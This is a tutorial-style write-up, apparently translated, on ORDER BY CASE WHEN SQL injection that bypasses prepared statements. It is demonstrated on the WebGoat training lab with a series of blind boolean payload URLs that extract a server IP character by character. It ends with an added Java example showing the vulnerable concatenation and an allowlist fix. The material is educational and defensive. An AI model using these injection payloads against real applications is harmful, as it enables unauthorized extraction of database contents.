Precompiled CASE injection
A CASE expression (called a "precompiled CASE" here because it is injected into a precompiled, i.e. prepared, statement) is a control construct in database query languages such as SQL. It evaluates a condition and selects one of several result branches, much like a switch statement in a programming language. Precompiled CASE injection is an injection attack that abuses CASE expressions in queries built with prepared statements.
The principle of a precompiled CASE injection attack is the same as that of other injection attacks: the attacker constructs specific input data to bypass the application's input validation and filtering, and thereby performs unauthorized operations or obtains sensitive information.
In a precompiled CASE injection attack, the attacker targets a query in the application that contains a conditional expression. By constructing a malicious conditional expression that slips past input validation and filtering, the attacker controls the outcome of that condition and so achieves the purpose of the attack.
1. SQL injection vulnerability defense
- Avoid building SQL statements by string concatenation; use precompilation (prepared statements) and similar techniques.
- Filter the parameters that enter the SQL statement adequately.
- Deploy security devices such as a WAF (web application firewall).
- Many current development frameworks have, technically, largely solved the SQL injection problem.
In Java, PreparedStatement inherits from Statement.
The role of PreparedStatement is to precompile SQL statements and then execute them, which prevents SQL injection.
PreparedStatement benefits:
- The SQL is precompiled, giving higher performance.
- It prevents SQL injection: sensitive characters in bound parameters are escaped rather than interpreted as SQL.
The process by which Java code operates the database is shown in the figure:
- Send the SQL statement to the MySQL server.
- The MySQL server processes the SQL statement:
  - Check the SQL statement: verify that its syntax is correct.
  - Compile the SQL statement into an executable form.
  Checking and compiling the SQL take longer than executing it. With a precompiled statement, only the parameters are reset on each call, so the check and compile steps do not have to be repeated; this is where the performance gain comes from.
- Execute the SQL statement.
As the saying goes, there is no absolute security: precompilation cannot completely prevent SQL injection, it can only mitigate it.
For example, parameter binding can be bypassed as follows: using a CASE WHEN expression, a SELECT statement can be embedded in the orderExpression after ORDER BY.
The prerequisite is that the SQL statement contains an ORDER BY clause (whose expression, unlike a value, cannot be bound as a parameter); only then can a precompiled statement be injected through CASE.
2. WEBGOAT SQL injection
2.1 WebGoat 8.0
Download address: https://github.com/WebGoat/WebGoat/wiki
WebGoat official website and usage: https://github.com/WebGoat/WebGoat
Run WebGoat by executing: java -jar webgoat-server-8.0.0.M21.jar
Then open http://127.0.0.1:8080/WebGoat in the browser; after registering a user you can use the WebGoat site.
2.2 Order by injection
Start the lab and open the lesson page.
The task is to obtain the IP address of the server whose hostname is webgoat-prd; the lesson notes that the Submit field has no SQL injection.
WebGoat's hint is to use a WHEN condition, i.e. when (true/false).
Use Burp (bp) to capture the request: click the IP column header to sort and capture the packet.
View packets
Sort by different columns
- Sort by IP:
- Sort by hostname:
Treat the value of the column parameter as the ORDER BY argument in the SQL statement.
Here we find that the value of the column parameter is user-controlled, so we can pass an arbitrary value and look at what the browser returns.
An error message is returned.
Looking closely at the error message, it contains the SQL statement:
select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by wuhu
So the value wuhu passed in column ends up as the ORDER BY argument. The error also leaks a lot of database information: the columns id, hostname, ip, mac, status and description, the table name servers, and the fact that the query only returns rows whose status is not 'out of order'. From this we can infer that the server with hostname webgoat-prd has status 'out of order', which is why a normal query cannot find it.
Using CASE WHEN for the injection, the whole SQL statement becomes:
select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by case when (true/false) then hostname else id end
Note: if the condition in WHEN is true the result is sorted by hostname, otherwise by id.
Note:
- The column names after THEN and ELSE must be valid, otherwise the SQL statement returns an error.
- The CASE expression must be closed with END.
2.2.1 Constructing the WHEN condition
Get the IP address of the server with hostname webgoat-prd:
select ip from servers where hostname='webgoat-prd'
Check whether the first character is 1:
substring((select ip from servers where hostname='webgoat-prd'),1,1)=1
The SUBSTRING function extracts a substring from a string.
Put the whole condition into WHEN; the complete URL is:
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when (substring((select ip from servers where hostname='webgoat-prd'),1,1)=1) then hostname else id end)
URL-encode the constructed parameter and send the request. The results come back sorted by hostname, which shows that the first digit of the IP address is 1.
The second character is 0.
The third character is 4.
The requests for which the condition evaluates to true, one per character, are listed below.
Note: they cannot be pasted directly into Burp; URL encoding is required.
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,1,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,2,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,3,1) from servers where hostname='webgoat-prd')=4) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,4,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,5,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,6,1) from servers where hostname='webgoat-prd')=3) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,7,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,8,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,9,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,10,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,11,1) from servers where hostname='webgoat-prd')=9) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,12,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,13,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,14,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,15,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
Putting the characters together, the IP address is 104.130.219.202.
Finally, enter the obtained IP address into the page and the lesson is passed.
2.2.2 Code audit
Locate the file Servers.java and analyze the source code. Although the server uses precompilation, it still splices the ORDER BY parameter column into the query string, resulting in a SQL injection vulnerability:
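The following is an added Java example; it is not WebGoat's Servers.java and not code from the original post. It illustrates both the point made in section 1 (parameter binding alone does not cover ORDER BY) and the pattern the audit above describes: the status value is bound with ?, but the sort column is concatenated, so the CASE expression from the lesson lands in the statement text. Beside it is the usual fix, an allowlist that maps the request's sort key to a fixed column name, since SQL identifiers cannot be bound as parameters. The class name ServerSortExample, the listServers method and the constructed inputs in main are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Map;

public class ServerSortExample {

    // Vulnerable pattern (illustrative, not WebGoat's actual Servers.java):
    // the WHERE value is bound with '?', but the ORDER BY column is taken
    // straight from the request, so an expression such as
    // "case when (...) then hostname else id end" becomes part of the
    // statement text that the database compiles.
    static String vulnerableQuery(String column) {
        return "select id, hostname, ip, mac, status, description from servers "
             + "where status <> ? order by " + column;
    }

    // Hardened pattern: map the user's sort key to a fixed column name.
    // Identifiers cannot be bound as '?' parameters, so an allowlist is the fix.
    private static final Map<String, String> SORT_COLUMNS = Map.of(
        "id", "id",
        "hostname", "hostname",
        "ip", "ip",
        "mac", "mac",
        "status", "status",
        "description", "description");

    static String safeQuery(String column) {
        String sortColumn = SORT_COLUMNS.get(column);
        if (sortColumn == null) {
            // Reject anything that is not a known column; do not echo the input.
            throw new IllegalArgumentException("unsupported sort column");
        }
        return "select id, hostname, ip, mac, status, description from servers "
             + "where status <> ? order by " + sortColumn;
    }

    // Assumed method: runs the hardened query with the status value bound.
    static void listServers(Connection conn, String column) throws SQLException {
        try (PreparedStatement ps = conn.prepareStatement(safeQuery(column))) {
            ps.setString(1, "out of order"); // bound value, never spliced
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    System.out.println(rs.getString("hostname") + " " + rs.getString("ip"));
                }
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal sort key and the CASE expression from the lesson.
        String normal = "hostname";
        String injected = "(case when ((select substring(ip,1,1) from servers "
                        + "where hostname='webgoat-prd')=1) then hostname else id end)";

        // The expression lands inside the statement text.
        System.out.println(vulnerableQuery(injected));
        // The allowlist version only ever emits one of the fixed column names.
        System.out.println(safeQuery(normal));
        try {
            safeQuery(injected);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist is the essential part: a WAF or character filter on the column parameter only narrows the set of expressions that get through, whereas mapping the request value to a fixed identifier means the database never sees user-supplied text in the ORDER BY position at all. The same approach applies to any other identifier position (table names, column lists, sort direction) that a prepared statement cannot parameterize.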